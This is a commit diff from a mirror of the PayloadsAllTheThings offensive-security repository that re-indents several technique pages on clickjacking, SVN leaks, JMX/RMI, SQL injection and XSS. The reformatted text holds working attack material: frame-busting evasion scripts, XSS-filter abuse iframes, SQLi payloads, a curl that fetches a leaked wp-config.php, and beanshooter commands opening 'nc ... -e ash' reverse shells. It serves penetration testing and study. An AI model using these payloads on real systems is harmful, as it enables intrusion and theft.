mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Fix invalid spaces indents
This commit is contained in:
parent
dc349c10c3
commit
f333d48960
@ -1,6 +1,6 @@
|
|||||||
# Clickjacking
|
# Clickjacking
|
||||||
|
|
||||||
> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives, potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions as such as typing in the password, clicking on ‘Delete my account’ button, liking a post, deleting a post, commenting on a blog. In other words all the actions that a normal user can do on a legitimate website can be done using clickjacking.
|
> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives, potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions as such as typing in the password, clicking on ‘Delete my account' button, liking a post, deleting a post, commenting on a blog. In other words all the actions that a normal user can do on a legitimate website can be done using clickjacking.
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
@ -38,10 +38,10 @@ The transparent UI element contains malicious content or actions that are visual
|
|||||||
the attacker can trick the user into interacting with the hidden content, believing they are interacting with the visible interface.
|
the attacker can trick the user into interacting with the hidden content, believing they are interacting with the visible interface.
|
||||||
|
|
||||||
* **How UI Redressing Works:**
|
* **How UI Redressing Works:**
|
||||||
* Overlaying Transparent Element: The attacker creates a transparent HTML element (usually a `<div>`) that covers the entire visible area of a legitimate website. This element is made transparent using CSS properties like `opacity: 0;`.
|
* Overlaying Transparent Element: The attacker creates a transparent HTML element (usually a `<div>`) that covers the entire visible area of a legitimate website. This element is made transparent using CSS properties like `opacity: 0;`.
|
||||||
* Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it.
|
* Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it.
|
||||||
* Misleading User Interaction: The attacker places deceptive elements within the transparent container, such as fake buttons, links, or forms. These elements perform actions when clicked, but the user is unaware of their presence due to the overlaying transparent UI element.
|
* Misleading User Interaction: The attacker places deceptive elements within the transparent container, such as fake buttons, links, or forms. These elements perform actions when clicked, but the user is unaware of their presence due to the overlaying transparent UI element.
|
||||||
* User Interaction: When the user interacts with the visible interface, they are unknowingly interacting with the hidden elements due to the transparent overlay. This interaction can lead to unintended actions or unauthorized operations.
|
* User Interaction: When the user interacts with the visible interface, they are unknowingly interacting with the hidden elements due to the transparent overlay. This interaction can lead to unintended actions or unauthorized operations.
|
||||||
```html
|
```html
|
||||||
<div style="opacity: 0; position: absolute; top: 0; left: 0; height: 100%; width: 100%;">
|
<div style="opacity: 0; position: absolute; top: 0; left: 0; height: 100%; width: 100%;">
|
||||||
<a href="malicious-link">Click me</a>
|
<a href="malicious-link">Click me</a>
|
||||||
@ -55,14 +55,13 @@ These iframes are made invisible by setting their dimensions to zero (height: 0;
|
|||||||
The content inside these invisible frames can be malicious, such as phishing forms, malware downloads, or any other harmful actions.
|
The content inside these invisible frames can be malicious, such as phishing forms, malware downloads, or any other harmful actions.
|
||||||
|
|
||||||
* **How Invisible Frames Work:**
|
* **How Invisible Frames Work:**
|
||||||
|
* Hidden IFrame Creation: The attacker includes an `<iframe>` element in a webpage, setting its dimensions to zero and removing its border, making it invisible to the user.
|
||||||
* Hidden IFrame Creation: The attacker includes an `<iframe>` element in a webpage, setting its dimensions to zero and removing its border, making it invisible to the user.
|
```html
|
||||||
```html
|
<iframe src="malicious-site" style="opacity: 0; height: 0; width: 0; border: none;"></iframe>
|
||||||
<iframe src="malicious-site" style="opacity: 0; height: 0; width: 0; border: none;"></iframe>
|
```
|
||||||
```
|
* Loading Malicious Content: The src attribute of the iframe points to a malicious website or resource controlled by the attacker. This content is loaded silently without the user's knowledge because the iframe is invisible.
|
||||||
* Loading Malicious Content: The src attribute of the iframe points to a malicious website or resource controlled by the attacker. This content is loaded silently without the user's knowledge because the iframe is invisible.
|
* User Interaction: The attacker overlays enticing elements on top of the invisible iframe, making it seem like the user is interacting with the visible interface. For instance, the attacker might position a transparent button over the invisible iframe. When the user clicks the button, they are essentially clicking on the hidden content within the iframe.
|
||||||
* User Interaction: The attacker overlays enticing elements on top of the invisible iframe, making it seem like the user is interacting with the visible interface. For instance, the attacker might position a transparent button over the invisible iframe. When the user clicks the button, they are essentially clicking on the hidden content within the iframe.
|
* Unintended Actions: Since the user is unaware of the invisible iframe, their interactions can lead to unintended actions, such as submitting forms, clicking on malicious links, or even performing financial transactions without their consent.
|
||||||
* Unintended Actions: Since the user is unaware of the invisible iframe, their interactions can lead to unintended actions, such as submitting forms, clicking on malicious links, or even performing financial transactions without their consent.
|
|
||||||
|
|
||||||
|
|
||||||
### Button/Form Hijacking
|
### Button/Form Hijacking
|
||||||
@ -70,29 +69,30 @@ The content inside these invisible frames can be malicious, such as phishing for
|
|||||||
Button/Form Hijacking is a Clickjacking technique where attackers trick users into interacting with invisible or hidden buttons/forms, leading to unintended actions on a legitimate website. By overlaying deceptive elements on top of visible buttons or forms, attackers can manipulate user interactions to perform malicious actions without the user's knowledge.
|
Button/Form Hijacking is a Clickjacking technique where attackers trick users into interacting with invisible or hidden buttons/forms, leading to unintended actions on a legitimate website. By overlaying deceptive elements on top of visible buttons or forms, attackers can manipulate user interactions to perform malicious actions without the user's knowledge.
|
||||||
|
|
||||||
* **How Button/Form Hijacking Works:**
|
* **How Button/Form Hijacking Works:**
|
||||||
* Visible Interface: The attacker presents a visible button or form to the user, encouraging them to click or interact with it.
|
* Visible Interface: The attacker presents a visible button or form to the user, encouraging them to click or interact with it.
|
||||||
```html
|
```html
|
||||||
<button onclick="submitForm()">Click me</button>
|
<button onclick="submitForm()">Click me</button>
|
||||||
```
|
```
|
||||||
* Invisible Overlay: The attacker overlays this visible button or form with an invisible or transparent element that contains a malicious action, such as submitting a hidden form.
|
|
||||||
|
* Invisible Overlay: The attacker overlays this visible button or form with an invisible or transparent element that contains a malicious action, such as submitting a hidden form.
|
||||||
```html
|
```html
|
||||||
<form action="malicious-site" method="POST" id="hidden-form" style="display: none;">
|
<form action="malicious-site" method="POST" id="hidden-form" style="display: none;">
|
||||||
<!-- Hidden form fields -->
|
<!-- Hidden form fields -->
|
||||||
</form>
|
</form>
|
||||||
```
|
```
|
||||||
* Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage.
|
|
||||||
|
|
||||||
```html
|
* Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage.
|
||||||
<button onclick="submitForm()">Click me</button>
|
```html
|
||||||
<form action="legitimate-site" method="POST" id="hidden-form">
|
<button onclick="submitForm()">Click me</button>
|
||||||
<!-- Hidden form fields -->
|
<form action="legitimate-site" method="POST" id="hidden-form">
|
||||||
</form>
|
<!-- Hidden form fields -->
|
||||||
<script>
|
</form>
|
||||||
function submitForm() {
|
<script>
|
||||||
document.getElementById('hidden-form').submit();
|
function submitForm() {
|
||||||
}
|
document.getElementById('hidden-form').submit();
|
||||||
</script>
|
}
|
||||||
```
|
</script>
|
||||||
|
```
|
||||||
|
|
||||||
### Execution Methods
|
### Execution Methods
|
||||||
|
|
||||||
@ -106,12 +106,12 @@ Button/Form Hijacking is a Clickjacking technique where attackers trick users in
|
|||||||
```
|
```
|
||||||
|
|
||||||
* Overlaying Visible Element: The attacker overlays a visible element (button or form) on their malicious page, encouraging users to interact with it. When the user clicks the visible element, they unknowingly trigger the hidden form's submission.
|
* Overlaying Visible Element: The attacker overlays a visible element (button or form) on their malicious page, encouraging users to interact with it. When the user clicks the visible element, they unknowingly trigger the hidden form's submission.
|
||||||
* Example in javascript:
|
|
||||||
```js
|
```js
|
||||||
function submitForm() {
|
function submitForm() {
|
||||||
document.getElementById('hidden-form').submit();
|
document.getElementById('hidden-form').submit();
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Preventive Measures
|
## Preventive Measures
|
||||||
@ -138,40 +138,46 @@ Example in HTML meta tag:
|
|||||||
|
|
||||||
* Since these type of client side protections relies on JavaScript frame busting code, if the victim has JavaScript disabled or it is possible for an attacker to disable JavaScript code, the web page will not have any protection mechanism against clickjacking.
|
* Since these type of client side protections relies on JavaScript frame busting code, if the victim has JavaScript disabled or it is possible for an attacker to disable JavaScript code, the web page will not have any protection mechanism against clickjacking.
|
||||||
* There are three deactivation techniques that can be used with frames:
|
* There are three deactivation techniques that can be used with frames:
|
||||||
* Restricted frames with Internet Explorer: Starting from IE6, a frame can have the "security" attribute that, if it is set to the value "restricted", ensures that JavaScript code, ActiveX controls, and re-directs to other sites do not work in the frame.
|
* Restricted frames with Internet Explorer: Starting from IE6, a frame can have the "security" attribute that, if it is set to the value "restricted", ensures that JavaScript code, ActiveX controls, and re-directs to other sites do not work in the frame.
|
||||||
```html
|
|
||||||
<iframe src="http://target site" security="restricted"></iframe>
|
```html
|
||||||
```
|
<iframe src="http://target site" security="restricted"></iframe>
|
||||||
* Sandbox attribute: with HTML5 there is a new attribute called “sandbox”. It enables a set of restrictions on content loaded into the iframe. At this moment this attribute is only compatible with Chrome and Safari.
|
```
|
||||||
```html
|
|
||||||
<iframe src="http://target site" sandbox></iframe>
|
* Sandbox attribute: with HTML5 there is a new attribute called “sandbox”. It enables a set of restrictions on content loaded into the iframe. At this moment this attribute is only compatible with Chrome and Safari.
|
||||||
```
|
|
||||||
|
```html
|
||||||
|
<iframe src="http://target site" sandbox></iframe>
|
||||||
|
```
|
||||||
|
|
||||||
## OnBeforeUnload Event
|
## OnBeforeUnload Event
|
||||||
|
|
||||||
* The `onBeforeUnload` event could be used to evade frame busting code. This event is called when the frame busting code wants to destroy the iframe by loading the URL in the whole web page and not only in the iframe. The handler function returns a string that is prompted to the user asking confirm if he wants to leave the page. When this string is displayed to the user is likely to cancel the navigation, defeating target’s frame busting attempt.
|
* The `onBeforeUnload` event could be used to evade frame busting code. This event is called when the frame busting code wants to destroy the iframe by loading the URL in the whole web page and not only in the iframe. The handler function returns a string that is prompted to the user asking confirm if he wants to leave the page. When this string is displayed to the user is likely to cancel the navigation, defeating target's frame busting attempt.
|
||||||
|
|
||||||
* The attacker can use this attack by registering an unload event on the top page using the following example code:
|
* The attacker can use this attack by registering an unload event on the top page using the following example code:
|
||||||
```html
|
```html
|
||||||
<h1>www.fictitious.site</h1>
|
<h1>www.fictitious.site</h1>
|
||||||
<script>
|
<script>
|
||||||
window.onbeforeunload = function()
|
window.onbeforeunload = function()
|
||||||
{
|
{
|
||||||
return " Do you want to leave fictitious.site?";
|
return " Do you want to leave fictitious.site?";
|
||||||
}
|
}
|
||||||
</script>
|
</script>
|
||||||
<iframe src="http://target site">
|
<iframe src="http://target site">
|
||||||
```
|
```
|
||||||
|
|
||||||
* The previous technique requires the user interaction but, the same result, can be achieved without prompting the user. To do this the attacker have to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting (for example every millisecond) a navigation request to a web page that responds with a _"HTTP/1.1 204 No Content"_ header.
|
* The previous technique requires the user interaction but, the same result, can be achieved without prompting the user. To do this the attacker have to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting (for example every millisecond) a navigation request to a web page that responds with a _"HTTP/1.1 204 No Content"_ header.
|
||||||
|
|
||||||
<br>_204 page:_
|
_204 page:_
|
||||||
|
|
||||||
```php
|
```php
|
||||||
<?php
|
<?php
|
||||||
header("HTTP/1.1 204 No Content");
|
header("HTTP/1.1 204 No Content");
|
||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
|
||||||
_Attacker's Page_
|
_Attacker's Page_
|
||||||
|
|
||||||
```js
|
```js
|
||||||
<script>
|
<script>
|
||||||
var prevent_bust = 0;
|
var prevent_bust = 0;
|
||||||
@ -192,31 +198,37 @@ _Attacker's Page_
|
|||||||
## XSS Filter
|
## XSS Filter
|
||||||
|
|
||||||
### IE8 XSS filter
|
### IE8 XSS filter
|
||||||
This filter has visibility into all parameters of each request and response flowing through the web browser and it compares them to a set of regular expressions in order to look for reflected XSS attempts. When the filter identifies a possible XSS attacks; it disables all inline scripts within the page, including frame busting scripts (the same thing could be done with external scripts). For this reason an attacker could induce a false positive by inserting the beginning of the frame busting script into a request’s parameters.
|
This filter has visibility into all parameters of each request and response flowing through the web browser and it compares them to a set of regular expressions in order to look for reflected XSS attempts. When the filter identifies a possible XSS attacks; it disables all inline scripts within the page, including frame busting scripts (the same thing could be done with external scripts). For this reason an attacker could induce a false positive by inserting the beginning of the frame busting script into a request's parameters.
|
||||||
```html
|
|
||||||
<script>
|
```html
|
||||||
if ( top != self )
|
<script>
|
||||||
{
|
if ( top != self )
|
||||||
top.location=self.location;
|
{
|
||||||
}
|
top.location=self.location;
|
||||||
</script>
|
}
|
||||||
```
|
</script>
|
||||||
Attacker View:
|
```
|
||||||
```html
|
|
||||||
<iframe src=”http://target site/?param=<script>if”>
|
Attacker View:
|
||||||
```
|
|
||||||
|
```html
|
||||||
|
<iframe src=”http://target site/?param=<script>if”>
|
||||||
|
```
|
||||||
|
|
||||||
### Chrome 4.0 XSSAuditor filter
|
### Chrome 4.0 XSSAuditor filter
|
||||||
|
|
||||||
It has a little different behaviour compared to IE8 XSS filter, in fact with this filter an attacker could deactivate a “script” by passing its code in a request parameter. This enables the framing page to specifically target a single snippet containing the frame busting code, leaving all the other codes intact.
|
It has a little different behaviour compared to IE8 XSS filter, in fact with this filter an attacker could deactivate a “script” by passing its code in a request parameter. This enables the framing page to specifically target a single snippet containing the frame busting code, leaving all the other codes intact.
|
||||||
Attacker View:
|
|
||||||
```html
|
Attacker View:
|
||||||
<iframe src=”http://target site/?param=if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D”>
|
|
||||||
```
|
```html
|
||||||
|
<iframe src=”http://target site/?param=if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D”>
|
||||||
|
```
|
||||||
|
|
||||||
## Challenge
|
## Challenge
|
||||||
|
|
||||||
Inspect the following code:
|
Inspect the following code:
|
||||||
|
|
||||||
```html
|
```html
|
||||||
<div style="position: absolute; opacity: 0;">
|
<div style="position: absolute; opacity: 0;">
|
||||||
<iframe src="https://legitimate-site.com/login" width="500" height="500"></iframe>
|
<iframe src="https://legitimate-site.com/login" width="500" height="500"></iframe>
|
||||||
|
@ -7,17 +7,17 @@
|
|||||||
|
|
||||||
* [Detection](#detection)
|
* [Detection](#detection)
|
||||||
* [Tools](#tools)
|
* [Tools](#tools)
|
||||||
* [Ysoserial](#ysoserial)
|
* [Ysoserial](#ysoserial)
|
||||||
* [Burp extensions using ysoserial](#burp-extensionsl)
|
* [Burp extensions using ysoserial](#burp-extensionsl)
|
||||||
* [Alternative Tooling](#alternative-tooling)
|
* [Alternative Tooling](#alternative-tooling)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Detection
|
## Detection
|
||||||
|
|
||||||
- `"AC ED 00 05"` in Hex
|
- `"AC ED 00 05"` in Hex
|
||||||
* `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
|
* `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
|
||||||
* `00 05`: STREAM_VERSION. The serialization version.
|
* `00 05`: STREAM_VERSION. The serialization version.
|
||||||
- `"rO0"` in Base64
|
- `"rO0"` in Base64
|
||||||
- Content-type = "application/x-java-serialized-object"
|
- Content-type = "application/x-java-serialized-object"
|
||||||
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
|
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
|
||||||
|
@ -8,7 +8,7 @@
|
|||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Springboot-Actuator](#springboot-actuator)
|
* [Springboot-Actuator](#springboot-actuator)
|
||||||
* [Remote Code Execution via /env](#remote-code-execution-via-env)
|
* [Remote Code Execution via /env](#remote-code-execution-via-env)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
|
@ -2,7 +2,6 @@
|
|||||||
|
|
||||||
> Subversion (often abbreviated as SVN) is a centralized version control system (VCS) that has been widely used in the software development industry. Originally developed by CollabNet Inc. in 2000, Subversion was designed to be an improved version of CVS (Concurrent Versions System) and has since gained significant traction for its robustness and reliability.
|
> Subversion (often abbreviated as SVN) is a centralized version control system (VCS) that has been widely used in the software development industry. Originally developed by CollabNet Inc. in 2000, Subversion was designed to be an improved version of CVS (Concurrent Versions System) and has since gained significant traction for its robustness and reliability.
|
||||||
|
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Tools](#tools)
|
* [Tools](#tools)
|
||||||
@ -10,7 +9,6 @@
|
|||||||
* [Methodology](#methodology)
|
* [Methodology](#methodology)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
### svn-extractor
|
### svn-extractor
|
||||||
@ -20,7 +18,6 @@
|
|||||||
python svn-extractor.py --url "url with .svn available"
|
python svn-extractor.py --url "url with .svn available"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Methodology
|
## Methodology
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
@ -28,16 +25,14 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
|||||||
```
|
```
|
||||||
|
|
||||||
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
|
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
|
||||||
```powershell
|
```powershell
|
||||||
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
|
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
|
||||||
```
|
```
|
||||||
2. Download interesting files
|
2. Download interesting files
|
||||||
* remove \$sha1\$ prefix
|
* remove \$sha1\$ prefix
|
||||||
* add .svn-base postfix
|
* add .svn-base postfix
|
||||||
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
|
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
|
||||||
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
@ -8,17 +8,17 @@
|
|||||||
* [Tools](#tools)
|
* [Tools](#tools)
|
||||||
* [Detection](#detection)
|
* [Detection](#detection)
|
||||||
* [Methodology](#methodology)
|
* [Methodology](#methodology)
|
||||||
* [RCE using beanshooter](#rce-using-beanshooter)
|
* [RCE using beanshooter](#rce-using-beanshooter)
|
||||||
* [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
|
* [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
|
||||||
* [RCE using Metasploit](#rce-using-metasploit)
|
* [RCE using Metasploit](#rce-using-metasploit)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
- [siberas/sjet](https://github.com/siberas/sjet)
|
- [siberas/sjet](https://github.com/siberas/sjet) - siberas JMX exploitation toolkit
|
||||||
- [mogwailabs/mjet](https://github.com/mogwailabs/mjet)
|
- [mogwailabs/mjet](https://github.com/mogwailabs/mjet) - MOGWAI LABS JMX exploitation toolkit
|
||||||
- [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
|
- [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) - Java RMI Vulnerability Scanner
|
||||||
- [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool.
|
- [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool.
|
||||||
|
|
||||||
|
|
||||||
@ -87,10 +87,12 @@ If a Java Remote Method Invocation (RMI) service is poorly configured, it become
|
|||||||
* Enumerate JMX endpoint: `beanshooter enum 172.17.0.2 1090`
|
* Enumerate JMX endpoint: `beanshooter enum 172.17.0.2 1090`
|
||||||
* Invoke method on a JMX endpoint: `beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'`
|
* Invoke method on a JMX endpoint: `beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'`
|
||||||
* Invoke arbitrary public and static Java methods:
|
* Invoke arbitrary public and static Java methods:
|
||||||
```ps1
|
|
||||||
beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'
|
```ps1
|
||||||
beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
|
beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'
|
||||||
```
|
beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
|
||||||
|
```
|
||||||
|
|
||||||
* Standard MBean execution: `beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash'`
|
* Standard MBean execution: `beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash'`
|
||||||
* Deserialization attacks on a JMX endpoint: `beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin`
|
* Deserialization attacks on a JMX endpoint: `beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin`
|
||||||
|
|
||||||
|
@ -11,8 +11,8 @@
|
|||||||
* [Defaults attributes](#defaults-attributes)
|
* [Defaults attributes](#defaults-attributes)
|
||||||
* [Exploiting userPassword attribute](#exploiting-userpassword-attribute)
|
* [Exploiting userPassword attribute](#exploiting-userpassword-attribute)
|
||||||
* [Scripts](#scripts)
|
* [Scripts](#scripts)
|
||||||
* [Discover valid LDAP fields](#discover-valid-ldap-fields)
|
* [Discover valid LDAP fields](#discover-valid-ldap-fields)
|
||||||
* [Special blind LDAP injection](#special-blind-ldap-injection)
|
* [Special blind LDAP injection](#special-blind-ldap-injection)
|
||||||
* [Labs](#labs)
|
* [Labs](#labs)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
@ -43,30 +43,30 @@
|
|||||||
Detecting the entry point in SQL injection (SQLi) involves identifying locations in an application where user input is not properly sanitized before it is included in SQL queries.
|
Detecting the entry point in SQL injection (SQLi) involves identifying locations in an application where user input is not properly sanitized before it is included in SQL queries.
|
||||||
|
|
||||||
* **Error Messages**: Inputting special characters (e.g., a single quote ') into input fields might trigger SQL errors. If the application displays detailed error messages, it can indicate a potential SQL injection point.
|
* **Error Messages**: Inputting special characters (e.g., a single quote ') into input fields might trigger SQL errors. If the application displays detailed error messages, it can indicate a potential SQL injection point.
|
||||||
* Simple characters: `'`, `"`, `;`, `)` and `*`
|
* Simple characters: `'`, `"`, `;`, `)` and `*`
|
||||||
* Simple characters encoded: `%27`, `%22`, `%23`, `%3B`, `%29` and `%2A`
|
* Simple characters encoded: `%27`, `%22`, `%23`, `%3B`, `%29` and `%2A`
|
||||||
* Multiple encoding: `%%2727`, `%25%27`
|
* Multiple encoding: `%%2727`, `%25%27`
|
||||||
* Unicode characters: `U+02BA`, `U+02B9`
|
* Unicode characters: `U+02BA`, `U+02B9`
|
||||||
* MODIFIER LETTER DOUBLE PRIME (`U+02BA` encoded as `%CA%BA`) is transformed into `U+0022` QUOTATION MARK (`)
|
* MODIFIER LETTER DOUBLE PRIME (`U+02BA` encoded as `%CA%BA`) is transformed into `U+0022` QUOTATION MARK (`)
|
||||||
* MODIFIER LETTER PRIME (`U+02B9` encoded as `%CA%B9`) is transformed into `U+0027` APOSTROPHE (')
|
* MODIFIER LETTER PRIME (`U+02B9` encoded as `%CA%B9`) is transformed into `U+0027` APOSTROPHE (')
|
||||||
|
|
||||||
* **Tautology-Based SQL Injection**: By inputting tautological (always true) conditions, you can test for vulnerabilities. For instance, entering `admin' OR '1'='1` in a username field might log you in as the admin if the system is vulnerable.
|
* **Tautology-Based SQL Injection**: By inputting tautological (always true) conditions, you can test for vulnerabilities. For instance, entering `admin' OR '1'='1` in a username field might log you in as the admin if the system is vulnerable.
|
||||||
* Merging characters
|
* Merging characters
|
||||||
```sql
|
```sql
|
||||||
`+HERP
|
`+HERP
|
||||||
'||'DERP
|
'||'DERP
|
||||||
'+'herp
|
'+'herp
|
||||||
' 'DERP
|
' 'DERP
|
||||||
'%20'HERP
|
'%20'HERP
|
||||||
'%2B'HERP
|
'%2B'HERP
|
||||||
```
|
```
|
||||||
* Logic Testing
|
* Logic Testing
|
||||||
```sql
|
```sql
|
||||||
page.asp?id=1 or 1=1 -- true
|
page.asp?id=1 or 1=1 -- true
|
||||||
page.asp?id=1' or 1=1 -- true
|
page.asp?id=1' or 1=1 -- true
|
||||||
page.asp?id=1" or 1=1 -- true
|
page.asp?id=1" or 1=1 -- true
|
||||||
page.asp?id=1 and 1=2 -- false
|
page.asp?id=1 and 1=2 -- false
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Timing Attacks**: Inputting SQL commands that cause deliberate delays (e.g., using `SLEEP` or `BENCHMARK` functions in MySQL) can help identify potential injection points. If the application takes an unusually long time to respond after such input, it might be vulnerable.
|
* **Timing Attacks**: Inputting SQL commands that cause deliberate delays (e.g., using `SLEEP` or `BENCHMARK` functions in MySQL) can help identify potential injection points. If the application takes an unusually long time to respond after such input, it might be vulnerable.
|
||||||
|
|
||||||
|
@ -3,9 +3,9 @@
|
|||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Client Side Template Injection](#client-side-template-injection)
|
* [Client Side Template Injection](#client-side-template-injection)
|
||||||
* [Stored/Reflected XSS](#storedreflected-xss)
|
* [Stored/Reflected XSS](#storedreflected-xss)
|
||||||
* [Advanced Bypassing XSS](#advanced-bypassing-xss)
|
* [Advanced Bypassing XSS](#advanced-bypassing-xss)
|
||||||
* [Blind XSS](#blind-xss)
|
* [Blind XSS](#blind-xss)
|
||||||
* [Automatic Sanitization](#automatic-sanitization)
|
* [Automatic Sanitization](#automatic-sanitization)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user